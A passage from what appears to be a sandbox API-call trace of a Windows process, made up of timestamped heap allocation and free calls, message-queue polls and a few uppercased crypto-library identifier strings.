dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0e78 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0219.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0219.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0219.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0219.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0219.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0219.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0219.909] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552d8 [0219.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0219.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0219.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0219.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55218 [0219.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0219.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0219.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0219.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0219.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0219.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0219.909] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0219.909] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55248 [0219.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0219.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0219.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0219.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0219.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0219.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0219.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0219.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0219.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0219.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0219.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0219.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0219.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0219.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0219.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0219.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0219.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0219.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf040) returned 0x2e9e3b8 [0219.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0219.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0219.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0219.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0219.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0219.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0219.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0219.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0219.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0219.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0219.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0219.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0219.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf040) returned 0x2ead400 [0219.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e9e3b8 | out: hHeap=0x970000) returned 1 [0219.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0219.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0219.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0219.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0219.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0219.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0219.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0219.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0219.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0219.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0219.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0219.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0219.929] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0219.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0219.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0219.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0219.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0219.929] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0219.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0219.929] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0219.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0219.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0219.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0219.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0219.929] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0219.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0219.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0219.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0219.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0219.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0219.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0219.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0219.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0219.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0219.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0219.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0219.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0219.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0219.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0219.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0219.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0219.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0219.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0219.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0219.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0219.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0219.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0219.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0219.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0219.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0219.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0219.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0219.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0219.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0219.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0219.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0219.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0219.965] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0219.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0219.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0219.965] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0219.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042d8 [0219.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0219.965] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0219.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0219.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0219.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0219.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0219.966] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0219.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0219.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0219.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0219.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0219.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0219.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0219.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0219.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0219.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0219.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0219.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0219.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0219.966] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0219.966] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0219.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0219.966] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0219.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0219.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0219.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0219.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0219.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0219.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0219.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0219.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0219.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0219.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0219.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf040) returned 0x2e9e3b8 [0219.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0219.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0219.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf040) returned 0x2ebc448 [0219.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0219.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0219.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e9e3b8 | out: hHeap=0x970000) returned 1 [0219.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0219.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0219.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0219.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0219.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0219.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf040) returned 0x2e9e3b8 [0219.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ebc448 | out: hHeap=0x970000) returned 1 [0219.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0219.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0219.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf040) returned 0x2ebc448 [0219.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e9e3b8 | out: hHeap=0x970000) returned 1 [0219.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0219.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0219.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0219.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0219.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0219.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0219.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0219.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0219.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0219.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0219.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0219.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0219.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0219.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0219.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0219.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0219.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0219.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0219.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0219.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0219.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0219.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0219.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0219.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0219.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0219.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0219.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0219.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0219.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0219.974] HeapFree (in: hHeap=0x970000, 